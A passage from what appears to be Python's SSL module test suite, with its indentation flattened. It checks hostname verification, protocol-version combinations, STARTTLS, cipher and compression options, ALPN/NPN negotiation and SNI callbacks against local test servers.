server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(SIGNED_CERTFILE)
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.verify_mode = ssl.CERT_REQUIRED
context.check_hostname = True
context.load_verify_locations(SIGNING_CA)
# correct hostname should verify
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with closing(context.wrap_socket(socket.socket(),
server_hostname="localhost")) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
# incorrect hostname should raise an exception
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with closing(context.wrap_socket(socket.socket(),
server_hostname="invalid")) as s:
with self.assertRaisesRegexp(ssl.CertificateError,
"hostname 'invalid' doesn't match u?'localhost'"):
s.connect((HOST, server.port))
# missing server_hostname arg should cause an exception, too
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with closing(socket.socket()) as s:
with self.assertRaisesRegexp(ValueError,
"check_hostname requires server_hostname"):
context.wrap_socket(s)
def test_empty_cert(self):
"""Connecting with an empty cert file"""
bad_cert_test(os.path.join(os.path.dirname(__file__) or os.curdir,
"nullcert.pem"))
def test_malformed_cert(self):
"""Connecting with a badly formatted certificate (syntax error)"""
bad_cert_test(os.path.join(os.path.dirname(__file__) or os.curdir,
"badcert.pem"))
def test_nonexisting_cert(self):
"""Connecting with a non-existing cert file"""
bad_cert_test(os.path.join(os.path.dirname(__file__) or os.curdir,
"wrongcert.pem"))
def test_malformed_key(self):
"""Connecting with a badly formatted key (syntax error)"""
bad_cert_test(os.path.join(os.path.dirname(__file__) or os.curdir,
"badkey.pem"))
def test_rude_shutdown(self):
"""A brutal shutdown of an SSL server should raise an OSError
in the client when attempting handshake.
"""
listener_ready = threading.Event()
listener_gone = threading.Event()
s = socket.socket()
port = support.bind_port(s, HOST)
# `listener` runs in a thread. It sits in an accept() until
# the main thread connects. Then it rudely closes the socket,
# and sets Event `listener_gone` to let the main thread know
# the socket is gone.
def listener():
s.listen(5)
listener_ready.set()
newsock, addr = s.accept()
newsock.close()
s.close()
listener_gone.set()
def connector():
listener_ready.wait()
with closing(socket.socket()) as c:
c.connect((HOST, port))
listener_gone.wait()
try:
ssl_sock = ssl.wrap_socket(c)
except socket.error:
pass
else:
self.fail('connecting to closed SSL socket should have failed')
t = threading.Thread(target=listener)
t.start()
try:
connector()
finally:
t.join()
@skip_if_broken_ubuntu_ssl
@unittest.skipUnless(hasattr(ssl, 'PROTOCOL_SSLv2'),
"OpenSSL is compiled without SSLv2 support")
def test_protocol_sslv2(self):
"""Connecting to an SSLv2 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True, ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv23, False)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLSv1, False)
# SSLv23 client with specific SSL options
if no_sslv2_implies_sslv3_hello():
# No SSLv2 => client will use an SSLv3 hello on recent OpenSSLs
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_SSLv2)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_SSLv3)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_TLSv1)
@skip_if_broken_ubuntu_ssl
def test_protocol_sslv23(self):
"""Connecting to an SSLv23 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try:
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv2, True)
except socket.error as x:
# this fails on some older versions of OpenSSL (0.9.7l, for instance)
if support.verbose:
sys.stdout.write(
" SSL2 client to SSL23 server test unexpectedly failed:\n %s\n"
% str(x))
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv23, True)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1, 'TLSv1')
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv3, False, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv23, True, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_OPTIONAL)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv3, False, ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv23, True, ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_REQUIRED)
# Server with specific SSL options
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv3, False,
server_options=ssl.OP_NO_SSLv3)
# Will choose TLSv1
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv23, True,
server_options=ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1, False,
server_options=ssl.OP_NO_TLSv1)
@skip_if_broken_ubuntu_ssl
@unittest.skipUnless(hasattr(ssl, 'PROTOCOL_SSLv3'),
"OpenSSL is compiled without SSLv3 support")
def test_protocol_sslv3(self):
"""Connecting to an SSLv3 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3')
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3', ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3', ssl.CERT_REQUIRED)
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv2, False)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_SSLv3)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_TLSv1, False)
if no_sslv2_implies_sslv3_hello():
# No SSLv2 => client will use an SSLv3 hello on recent OpenSSLs
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv23,
False, client_options=ssl.OP_NO_SSLv2)
@skip_if_broken_ubuntu_ssl
def test_protocol_tlsv1(self):
"""Connecting to a TLSv1 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1')
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_REQUIRED)
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv2, False)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_TLSv1)
@skip_if_broken_ubuntu_ssl
@unittest.skipUnless(hasattr(ssl, "PROTOCOL_TLSv1_1"),
"TLS version 1.1 not supported.")
def test_protocol_tlsv1_1(self):
"""Connecting to a TLSv1.1 server with various client options.
Testing against older TLS versions."""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1_1, 'TLSv1.1')
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_SSLv2, False)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_TLSv1_1)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1_1, 'TLSv1.1')
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1_1, False)
@skip_if_broken_ubuntu_ssl
@unittest.skipUnless(hasattr(ssl, "PROTOCOL_TLSv1_2"),
"TLS version 1.2 not supported.")
def test_protocol_tlsv1_2(self):
"""Connecting to a TLSv1.2 server with various client options.
Testing against older TLS versions."""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1_2, 'TLSv1.2',
server_options=ssl.OP_NO_SSLv3|ssl.OP_NO_SSLv2,
client_options=ssl.OP_NO_SSLv3|ssl.OP_NO_SSLv2,)
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_SSLv2, False)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_TLSv1_2)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1_2, 'TLSv1.2')
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1_2, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1_1, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1_2, False)
def test_starttls(self):
"""Switching from clear text to encrypted and back again."""
msgs = (b"msg 1", b"MSG 2", b"STARTTLS", b"MSG 3", b"msg 4", b"ENDTLS", b"msg 5", b"msg 6")
server = ThreadedEchoServer(CERTFILE,
ssl_version=ssl.PROTOCOL_TLSv1,
starttls_server=True,
chatty=True,
connectionchatty=True)
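# 'wrapped' tracks whether the client side of the conversation is currently
# running over TLS (i.e. after STARTTLS and before ENDTLS).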
wrapped = False
with server:
s = socket.socket()
s.setblocking(1)
s.connect((HOST, server.port))
if support.verbose:
sys.stdout.write("\n")
for indata in msgs:
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
if wrapped:
conn.write(indata)
outdata = conn.read()
else:
s.send(indata)
outdata = s.recv(1024)
msg = outdata.strip().lower()
if indata == b"STARTTLS" and msg.startswith(b"ok"):
# STARTTLS ok, switch to secure mode
if support.verbose:
sys.stdout.write(
" client: read %r from server, starting TLS...\n"
% msg)
conn = ssl.wrap_socket(s, ssl_version=ssl.PROTOCOL_TLSv1)
wrapped = True
elif indata == b"ENDTLS" and msg.startswith(b"ok"):
# ENDTLS ok, switch back to clear text
if support.verbose:
sys.stdout.write(
" client: read %r from server, ending TLS...\n"
% msg)
s = conn.unwrap()
wrapped = False
else:
if support.verbose:
sys.stdout.write(
" client: read %r from server\n" % msg)
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
if wrapped:
conn.write(b"over\n")
else:
s.send(b"over\n")
if wrapped:
conn.close()
else:
s.close()
def test_socketserver(self):
"""Using a SocketServer to create and manage SSL connections."""
server = make_https_server(self, certfile=CERTFILE)
# try to connect
if support.verbose:
sys.stdout.write('\n')
with open(CERTFILE, 'rb') as f:
d1 = f.read()
d2 = ''
# now fetch the same data from the HTTPS server
url = 'https://localhost:%d/%s' % (
server.port, os.path.split(CERTFILE)[1])
context = ssl.create_default_context(cafile=CERTFILE)
f = urllib2.urlopen(url, context=context)
try:
dlen = f.info().getheader("content-length")
if dlen and (int(dlen) > 0):
d2 = f.read(int(dlen))
if support.verbose:
sys.stdout.write(
" client: read %d bytes from remote server '%s'\n"
% (len(d2), server))
finally:
f.close()
self.assertEqual(d1, d2)
def test_asyncore_server(self):
"""Check the example asyncore integration."""
indata = "TEST MESSAGE of mixed case\n"
if support.verbose:
sys.stdout.write("\n")
indata = b"FOO\n"
server = AsyncoreEchoServer(CERTFILE)
with server:
s = ssl.wrap_socket(socket.socket())
s.connect(('127.0.0.1', server.port))
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
s.write(indata)
outdata = s.read()
if support.verbose:
sys.stdout.write(" client: read %r\n" % outdata)
if outdata != indata.lower():
self.fail(
"bad data <<%r>> (%d) received; expected <<%r>> (%d)\n"
% (outdata[:20], len(outdata),
indata[:20].lower(), len(indata)))
s.write(b"over\n")
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
s.close()
if support.verbose:
sys.stdout.write(" client: connection closed.\n")
def test_recv_send(self):
"""Test recv(), send() and friends."""
if support.verbose:
sys.stdout.write("\n")
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1,
cacerts=CERTFILE,
chatty=True,
connectionchatty=False)
with server:
s = ssl.wrap_socket(socket.socket(),
server_side=False,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1)
s.connect((HOST, server.port))
# helper methods for standardising recv* method signatures
def _recv_into():
b = bytearray(b"\0"*100)
count = s.recv_into(b)
return b[:count]
def _recvfrom_into():
b = bytearray(b"\0"*100)
count, addr = s.recvfrom_into(b)
return b[:count]
# (name, method, whether to expect success, *args)
send_methods = [
('send', s.send, True, []),
('sendto', s.sendto, False, ["some.address"]),
('sendall', s.sendall, True, []),
]
recv_methods = [
('recv', s.recv, True, []),
('recvfrom', s.recvfrom, False, ["some.address"]),
('recv_into', _recv_into, True, []),
('recvfrom_into', _recvfrom_into, False, []),
]
data_prefix = u"PREFIX_"
for meth_name, send_meth, expect_success, args in send_methods:
indata = (data_prefix + meth_name).encode('ascii')
try:
send_meth(indata, *args)
outdata = s.read()
if outdata != indata.lower():
self.fail(
"While sending with <<{name:s}>> bad data "
"<<{outdata:r}>> ({nout:d}) received; "
"expected <<{indata:r}>> ({nin:d})\n".format(
name=meth_name, outdata=outdata[:20],
nout=len(outdata),
indata=indata[:20], nin=len(indata)
)
)
except ValueError as e:
if expect_success:
self.fail(
"Failed to send with method <<{name:s}>>; "
"expected to succeed.\n".format(name=meth_name)
)
if not str(e).startswith(meth_name):
self.fail(
"Method <<{name:s}>> failed with unexpected "
"exception message: {exp:s}\n".format(
name=meth_name, exp=e
)
)
for meth_name, recv_meth, expect_success, args in recv_methods:
indata = (data_prefix + meth_name).encode('ascii')
try:
s.send(indata)
outdata = recv_meth(*args)
if outdata != indata.lower():
self.fail(
"While receiving with <<{name:s}>> bad data "
"<<{outdata:r}>> ({nout:d}) received; "
"expected <<{indata:r}>> ({nin:d})\n".format(
name=meth_name, outdata=outdata[:20],
nout=len(outdata),
indata=indata[:20], nin=len(indata)
)
)
except ValueError as e:
if expect_success:
self.fail(
"Failed to receive with method <<{name:s}>>; "
"expected to succeed.\n".format(name=meth_name)
)
if not str(e).startswith(meth_name):
self.fail(
"Method <<{name:s}>> failed with unexpected "
"exception message: {exp:s}\n".format(
name=meth_name, exp=e
)
)
# consume data
s.read()
s.write(b"over\n")
s.close()
def test_handshake_timeout(self):
# Issue #5103: SSL handshake must respect the socket timeout
server = socket.socket(socket.AF_INET)
host = "127.0.0.1"
port = support.bind_port(server)
started = threading.Event()
finish = False
def serve():
server.listen(5)
started.set()
conns = []
while not finish:
r, w, e = select.select([server], [], [], 0.1)
if server in r:
# Let the socket hang around rather than having
# it closed by garbage collection.
conns.append(server.accept()[0])
for sock in conns:
sock.close()
t = threading.Thread(target=serve)
t.start()
started.wait()
try:
try:
c = socket.socket(socket.AF_INET)
c.settimeout(0.2)
c.connect((host, port))
# Will attempt handshake and time out
self.assertRaisesRegexp(ssl.SSLError, "timed out",
ssl.wrap_socket, c)
finally:
c.close()
try:
c = socket.socket(socket.AF_INET)
c = ssl.wrap_socket(c)
c.settimeout(0.2)
# Will attempt handshake and time out
self.assertRaisesRegexp(ssl.SSLError, "timed out",
c.connect, (host, port))
finally:
c.close()
finally:
finish = True
t.join()
server.close()
def test_server_accept(self):
# Issue #16357: accept() on a SSLSocket created through
# SSLContext.wrap_socket().
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(CERTFILE)
context.load_cert_chain(CERTFILE)
server = socket.socket(socket.AF_INET)
host = "127.0.0.1"
port = support.bind_port(server)
server = context.wrap_socket(server, server_side=True)
evt = threading.Event()
remote = [None]
peer = [None]
def serve():
server.listen(5)
# Block on the accept and wait on the connection to close.
evt.set()
remote[0], peer[0] = server.accept()
remote[0].recv(1)
t = threading.Thread(target=serve)
t.start()
# Client waits until the server is set up, then performs a connect.
evt.wait()
client = context.wrap_socket(socket.socket())
client.connect((host, port))
client_addr = client.getsockname()
client.close()
t.join()
remote[0].close()
server.close()
# Sanity checks.
self.assertIsInstance(remote[0], ssl.SSLSocket)
self.assertEqual(peer[0], client_addr)
def test_getpeercert_enotconn(self):
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
with closing(context.wrap_socket(socket.socket())) as sock:
with self.assertRaises(socket.error) as cm:
sock.getpeercert()
self.assertEqual(cm.exception.errno, errno.ENOTCONN)
def test_do_handshake_enotconn(self):
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
with closing(context.wrap_socket(socket.socket())) as sock:
with self.assertRaises(socket.error) as cm:
sock.do_handshake()
self.assertEqual(cm.exception.errno, errno.ENOTCONN)
def test_default_ciphers(self):
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
try:
# Force a set of weak ciphers on our client context
context.set_ciphers("DES")
except ssl.SSLError:
self.skipTest("no DES cipher available")
with ThreadedEchoServer(CERTFILE,
ssl_version=ssl.PROTOCOL_SSLv23,
chatty=False) as server:
with closing(context.wrap_socket(socket.socket())) as s:
with self.assertRaises(ssl.SSLError):
s.connect((HOST, server.port))
self.assertIn("no shared cipher", str(server.conn_errors[0]))
def test_version_basic(self):
"""
Basic tests for SSLSocket.version().
More tests are done in the test_protocol_*() methods.
"""
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
with ThreadedEchoServer(CERTFILE,
ssl_version=ssl.PROTOCOL_TLSv1,
chatty=False) as server:
with closing(context.wrap_socket(socket.socket())) as s:
self.assertIs(s.version(), None)
s.connect((HOST, server.port))
self.assertEqual(s.version(), "TLSv1")
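# Once the socket has been closed (end of the with-block), version()
# reverts to None.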
self.assertIs(s.version(), None)
@unittest.skipUnless(ssl.HAS_ECDH, "test requires ECDH-enabled OpenSSL")
def test_default_ecdh_curve(self):
# Issue #21015: elliptic curve-based Diffie Hellman key exchange
# should be enabled by default on SSL contexts.
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context.load_cert_chain(CERTFILE)
# Prior to OpenSSL 1.0.0, ECDH ciphers have to be enabled
# explicitly using the 'ECCdraft' cipher alias. Otherwise,
# our default cipher list should prefer ECDH-based ciphers
# automatically.
if ssl.OPENSSL_VERSION_INFO < (1, 0, 0):
context.set_ciphers("ECCdraft:ECDH")
with ThreadedEchoServer(context=context) as server:
with closing(context.wrap_socket(socket.socket())) as s:
s.connect((HOST, server.port))
self.assertIn("ECDH", s.cipher()[0])
@unittest.skipUnless("tls-unique" in ssl.CHANNEL_BINDING_TYPES,
"'tls-unique' channel binding not available")
def test_tls_unique_channel_binding(self):
"""Test tls-unique channel binding."""
if support.verbose:
sys.stdout.write("\n")
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1,
cacerts=CERTFILE,
chatty=True,
connectionchatty=False)
with server:
s = ssl.wrap_socket(socket.socket(),
server_side=False,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1)
s.connect((HOST, server.port))
# get the data
cb_data = s.get_channel_binding("tls-unique")
if support.verbose:
sys.stdout.write(" got channel binding data: {0!r}\n"
.format(cb_data))
# check if it is sane
self.assertIsNotNone(cb_data)
self.assertEqual(len(cb_data), 12) # True for TLSv1
# and compare with the peers version
s.write(b"CB tls-unique\n")
peer_data_repr = s.read().strip()
self.assertEqual(peer_data_repr,
repr(cb_data).encode("us-ascii"))
s.close()
# now, again
s = ssl.wrap_socket(socket.socket(),
server_side=False,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1)
s.connect((HOST, server.port))
new_cb_data = s.get_channel_binding("tls-unique")
if support.verbose:
sys.stdout.write(" got another channel binding data: {0!r}\n"
.format(new_cb_data))
# is it really unique
self.assertNotEqual(cb_data, new_cb_data)
self.assertIsNotNone(cb_data)
self.assertEqual(len(cb_data), 12) # True for TLSv1
s.write(b"CB tls-unique\n")
peer_data_repr = s.read().strip()
self.assertEqual(peer_data_repr,
repr(new_cb_data).encode("us-ascii"))
s.close()
def test_compression(self):
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.load_cert_chain(CERTFILE)
stats = server_params_test(context, context,
chatty=True, connectionchatty=True)
if support.verbose:
sys.stdout.write(" got compression: {!r}\n".format(stats['compression']))
self.assertIn(stats['compression'], { None, 'ZLIB', 'RLE' })
@unittest.skipUnless(hasattr(ssl, 'OP_NO_COMPRESSION'),
"ssl.OP_NO_COMPRESSION needed for this test")
def test_compression_disabled(self):
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.load_cert_chain(CERTFILE)
context.options |= ssl.OP_NO_COMPRESSION
stats = server_params_test(context, context,
chatty=True, connectionchatty=True)
self.assertIs(stats['compression'], None)
def test_dh_params(self):
# Check we can get a connection with ephemeral Diffie-Hellman
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.load_cert_chain(CERTFILE)
context.load_dh_params(DHFILE)
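# "kEDH" restricts the cipher list to ephemeral Diffie-Hellman key exchange,
# so the cipher negotiated below has to be a DH(E)/ADH suite.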
context.set_ciphers("kEDH")
stats = server_params_test(context, context,
chatty=True, connectionchatty=True)
cipher = stats["cipher"][0]
parts = cipher.split("-")
if "ADH" not in parts and "EDH" not in parts and "DHE" not in parts:
self.fail("Non-DH cipher: " + cipher[0])
def test_selected_alpn_protocol(self):
# selected_alpn_protocol() is None unless ALPN is used.
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.load_cert_chain(CERTFILE)
stats = server_params_test(context, context,
chatty=True, connectionchatty=True)
self.assertIs(stats['client_alpn_protocol'], None)
@unittest.skipUnless(ssl.HAS_ALPN, "ALPN support required")
def test_selected_alpn_protocol_if_server_uses_alpn(self):
# selected_alpn_protocol() is None unless ALPN is used by the client.
client_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
client_context.load_verify_locations(CERTFILE)
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(CERTFILE)
server_context.set_alpn_protocols(['foo', 'bar'])
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True)
self.assertIs(stats['client_alpn_protocol'], None)
@unittest.skipUnless(ssl.HAS_ALPN, "ALPN support needed for this test")
def test_alpn_protocols(self):
server_protocols = ['foo', 'bar', 'milkshake']
protocol_tests = [
(['foo', 'bar'], 'foo'),
(['bar', 'foo'], 'foo'),
(['milkshake'], 'milkshake'),
(['http/3.0', 'http/4.0'], None)
]
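# With ALPN the server's own preference order decides the outcome (hence
# 'foo' even when the client offers ['bar', 'foo']), and an empty
# intersection selects no protocol at all (None).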
for client_protocols, expected in protocol_tests:
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(CERTFILE)
server_context.set_alpn_protocols(server_protocols)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
client_context.load_cert_chain(CERTFILE)
client_context.set_alpn_protocols(client_protocols)
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True)
msg = "failed trying %s (s) and %s (c).\n" \
"was expecting %s, but got %%s from the %%s" \
% (str(server_protocols), str(client_protocols),
str(expected))
client_result = stats['client_alpn_protocol']
self.assertEqual(client_result, expected, msg % (client_result, "client"))
server_result = stats['server_alpn_protocols'][-1] \
if len(stats['server_alpn_protocols']) else 'nothing'
self.assertEqual(server_result, expected, msg % (server_result, "server"))
def test_selected_npn_protocol(self):
# selected_npn_protocol() is None unless NPN is used
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.load_cert_chain(CERTFILE)
stats = server_params_test(context, context,
chatty=True, connectionchatty=True)
self.assertIs(stats['client_npn_protocol'], None)
@unittest.skipUnless(ssl.HAS_NPN, "NPN support needed for this test")
def test_npn_protocols(self):
server_protocols = ['http/1.1', 'spdy/2']
protocol_tests = [
(['http/1.1', 'spdy/2'], 'http/1.1'),
(['spdy/2', 'http/1.1'], 'http/1.1'),
(['spdy/2', 'test'], 'spdy/2'),
(['abc', 'def'], 'abc')
]
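# NPN selection is made on the client side; when there is no overlap the
# client falls back to its own first protocol, which is why ['abc', 'def']
# still yields 'abc'.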
for client_protocols, expected in protocol_tests:
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(CERTFILE)
server_context.set_npn_protocols(server_protocols)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
client_context.load_cert_chain(CERTFILE)
client_context.set_npn_protocols(client_protocols)
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True)
msg = "failed trying %s (s) and %s (c).\n" \
"was expecting %s, but got %%s from the %%s" \
% (str(server_protocols), str(client_protocols),
str(expected))
client_result = stats['client_npn_protocol']
self.assertEqual(client_result, expected, msg % (client_result, "client"))
server_result = stats['server_npn_protocols'][-1] \
if len(stats['server_npn_protocols']) else 'nothing'
self.assertEqual(server_result, expected, msg % (server_result, "server"))
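# Helper for the SNI tests below: a default server context, an alternate
# context with a different certificate to switch to, and a client context
# that verifies against the signing CA.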
def sni_contexts(self):
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(SIGNED_CERTFILE)
other_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
other_context.load_cert_chain(SIGNED_CERTFILE2)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
client_context.verify_mode = ssl.CERT_REQUIRED
client_context.load_verify_locations(SIGNING_CA)
return server_context, other_context, client_context
def check_common_name(self, stats, name):
cert = stats['peercert']
self.assertIn((('commonName', name),), cert['subject'])
@needs_sni
def test_sni_callback(self):
calls = []
server_context, other_context, client_context = self.sni_contexts()
def servername_cb(ssl_sock, server_name, initial_context):
calls.append((server_name, initial_context))
if server_name is not None:
ssl_sock.context = other_context
server_context.set_servername_callback(servername_cb)
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name='supermessage')
# The hostname was fetched properly, and the certificate was
# changed for the connection.
self.assertEqual(calls, [("supermessage", server_context)])
# CERTFILE4 was selected
self.check_common_name(stats, 'fakehostname')
calls = []
# The callback is called with server_name=None
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name=None)
self.assertEqual(calls, [(None, server_context)])
self.check_common_name(stats, 'localhost')
# Check disabling the callback
calls = []
server_context.set_servername_callback(None)
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name='notfunny')
# Certificate didn't change
self.check_common_name(stats, 'localhost')
self.assertEqual(calls, [])
@needs_sni
def test_sni_callback_alert(self):
# Returning a TLS alert is reflected to the connecting client
server_context, other_context, client_context = self.sni_contexts()
def cb_returning_alert(ssl_sock, server_name, initial_context):
return ssl.ALERT_DESCRIPTION_ACCESS_DENIED
server_context.set_servername_callback(cb_returning_alert)
with self.assertRaises(ssl.SSLError) as cm:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
self.assertEqual(cm.exception.reason, 'TLSV1_ALERT_ACCESS_DENIED')
@needs_sni
def test_sni_callback_raising(self):
# Raising fails the connection with a TLS handshake failure alert.
server_context, other_context, client_context = self.sni_contexts()
def cb_raising(ssl_sock, server_name, initial_context):
1.0/0.0
server_context.set_servername_callback(cb_raising)
with self.assertRaises(ssl.SSLError) as cm, \
support.captured_stderr() as stderr:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
